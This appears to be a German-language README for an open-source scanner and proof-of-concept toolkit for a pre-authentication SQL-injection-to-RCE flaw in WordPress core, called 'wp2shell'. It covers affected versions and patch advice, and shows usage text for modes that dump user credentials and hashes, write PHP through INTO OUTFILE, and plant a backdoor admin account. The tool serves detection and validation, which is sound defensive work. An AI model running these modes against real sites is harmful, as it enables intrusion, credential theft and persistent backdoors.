
Ein Scanner und Proof-of-Concept-Toolkit für CVE-2026-63030 (wp2shell) - vorauthentifizierte Remote-Code-Ausführung im WordPress-Kern

--check-type time-based (SLEEP-Timing) und --check-type error-based (TRUE/FALSE/gebrochene Differenz). Beide sicher für großflächige Scans.--i-have-authorization.CVE-2026-63030 („wp2shell“) ist eine vorauthentifizierte Remote-Code-Ausführungsschwachstelle im WordPress-Core. Ein Routen-Konfusions-/Index-Desynchronisations-Bug im REST-API-Batch-Endpunkt (/batch/v1) erlaubt einem nicht authentifizierten Angreifer, einen unsanierten author_exclude-Wert in WP_Query zu schmuggeln, was zu SQL-Injektion führt. Wenn der Datenbankbenutzer über das FILE-Privileg verfügt, führt dies zu Remote-Code-Ausführung über SELECT ... INTO OUTFILE. Es sind keine Plugins erforderlich. Eine Standard-WordPress-Installation ist betroffen.
WordPress hat Fixes in den Versionen 6.9.5, 7.0.2 und 7.1-beta2 ausgeliefert. Sofort patchen. Wenn Sie Hilfe beim Scannen oder Entdecken dieser Schwachstelle in Ihrer Infrastruktur benötigen, schreiben Sie eine E-Mail an [email protected]. Lesen Sie mehr dazu im fullhunt.io Blog.
| Branch | Verwundbar | Behoben |
|---|---|---|
| 6.9 | 6.9.0–6.9.4 | 6.9.5 |
| 7.0 | 7.0.0–7.0.1 | 7.0.2 |
| 7.1 | 7.1-beta1 | 7.1-beta2 |
| < 6.9 | Nicht betroffen (Batch-Endpunkt nicht vorhanden) | — |
Wir haben wp2shell (CVE-2026-63030) seit seiner öffentlichen Offenlegung erforscht und daran gearbeitet, diese Schwachstelle bei unseren Kunden zu verhindern. Wir stellen ein offenes Erkennungs- und Scantool für das Entdecken und Validieren von CVE-2026-63030 als Open Source zur Verfügung. Dieses soll von Sicherheitsteams verwendet werden, um ihre Infrastruktur auf wp2shell zu scannen und zu überprüfen, ob WAF-Regeln und Patches die Angriffskette in der eigenen Umgebung tatsächlich blockieren.
wp2shell-scan.py ist ein einzelner, einheitlicher Scanner, der acht Modi unterstützt:
| Modus | Zweck | Autorisierung |
|---|---|---|
check | Zerstörungsfreie Erkennung. Zwei Prüftypen: --check-type time-based (SLEEP-Timing-Sonde) oder --check-type error-based (TRUE/FALSE/gebrochene Differenz). | Nein |
probe-endpoints | Entdecken, welche REST-Endpunkte die Injektion an WP_Query weiterleiten. | Nein |
probe | Nebeneinander-Vergleich von N SQL-Payload-Antworten. | Nein |
extract | Boolean-Oracle-Extraktion von DB-Metadaten und Hashes. | Ja |
blind | Timing-basierte Blind-Extraktion (Fallback, wenn das Boolean-Orakel unzuverlässig ist). | Ja |
exploit | Validieren der vollständigen SQLi → INTO OUTFILE → PHP-Ausführungs-Kette. | Ja |
adduser | Schreiben eines mu-Plugin-Backdoors, das ein Admin-Konto erstellt; fällt auf Boolean-Hash-Extraktion zurück. | Ja |
get-users | Boolean-Oracle-Dump aller wp_users-Anmeldedaten. | Ja |
Hinweis: Modi, die unter „Autorisierung“ mit „Ja“ gekennzeichnet sind, erfordern das Flag
--i-have-authorization.
$ python3 wp2shell-scan.py -h
usage: wp2shell-scan.py [-h] [-u URL] [-l USEDLIST] [-p PROXY]
[--check-type {time-based,error-based}] [-k]
[--timeout TIMEOUT] [--sleep SLEEP]
[--endpoint ENDPOINT] [--webroot PATH[,PATH...]]
[--out-name OUT_NAME] [--php-code PHP_CODE]
[--user-login USER_LOGIN] [--user-pass USER_PASS]
[--user-email USER_EMAIL] [--i-have-authorization]
[--sql LABEL:SQL] [--query QUERY] [--dump [KEY ...]]
[--all] [-v]
{check,probe-endpoints,probe,extract,blind,exploit,adduser,get-users}
CVE-2026-63030 (wp2shell) scanner: time-based / error-based checks, Boolean and blind extraction, authorized exploit validation.
positional arguments:
{check,probe-endpoints,probe,extract,blind,exploit,adduser,get-users}
Scan mode.
options:
-h, --help show this help message and exit
-u URL, --url URL Check a single URL.
-l USEDLIST, --list USEDLIST
Check a list of URLs.
-p PROXY, --proxy PROXY
Send requests through proxy.
--check-type {time-based,error-based}
Detection method for check mode - [Default: time-based].
-k, --insecure Disable TLS certificate verification.
--timeout TIMEOUT HTTP timeout (in seconds) - [Default: 15].
--sleep SLEEP SLEEP seconds for time-based checks and blind mode - [Default: 5].
--endpoint ENDPOINT REST endpoint used for the injection - [Default: /wp/v2/categories].
--webroot PATH[,PATH...]
Server webroot for OUTFILE writes; repeatable - [Default: /var/www/html].
--out-name OUT_NAME Dropped filename - [Default: random].
--php-code PHP_CODE PHP written as the OUTFILE row terminator - [Default: '<?php phpinfo(); ?>'].
--user-login USER_LOGIN
Backdoor username for adduser mode - [Default: wpadmin].
--user-pass USER_PASS
Backdoor password for adduser mode.
--user-email USER_EMAIL
Backdoor email for adduser mode.
--i-have-authorization
Required for exploit, adduser, get-users, extract, and blind modes.
--sql LABEL:SQL probe mode: repeatable label:sql payload pair.
--query QUERY extract/blind mode: custom SQL scalar query to extract.
--dump [KEY ...] extract mode: prebuilt query keys (comma or space separated); empty=user+db+version.
--all extract mode: dump all prebuilt queries.
-v, --verbose
$ python3 wp2shell-scan.py check -u https://wp.lab.local --check-type time-based
$ python3 wp2shell-scan.py check -u https://wp.lab.local --check-type error-based
$ python3 wp2shell-scan.py check -l urls.txt
$ python3 wp2shell-scan.py probe-endpoints -u https://wp.lab.local
$ python3 wp2shell-scan.py extract -u https://wp.lab.local --i-have-authorization --dump user,database,version
$ python3 wp2shell-scan.py exploit -u https://wp.lab.local --i-have-authorization
$ pip3 install -r requirements.txt
git clone https://github.com/fullhunt/wp2shell-scan.git
cd wp2shell-scan
sudo docker build -t wp2shell-scan .
sudo docker run -it --rm wp2shell-scan check -u https://wp.lab.local